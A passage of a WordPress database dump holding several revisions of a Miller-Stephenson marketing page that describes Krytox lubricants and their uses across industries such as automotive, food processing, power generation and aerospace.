becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:01:51', '2016-09-28 17:01:51', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2087, 2, '2016-09-28 17:03:42', '2016-09-28 17:03:42', '', 'tribosys-hydraulic-oil', '', 'inherit', 'closed', 'closed', '', 'tribosys-hydraulic-oil-2', '', '', '2016-09-28 17:03:42', '2016-09-28 17:03:42', '', 2058, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/tribosys-hydraulic-oil-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2088, 2, '2016-09-28 17:08:15', '2016-09-28 17:08:15', '[button size="medium" style="is-outline white" text="Medium button" link="https://"]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>[displayProduct]Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:08:15', '2016-09-28 17:08:15', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2089, 2, '2016-09-28 17:10:04', '2016-09-28 17:10:04', '<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" 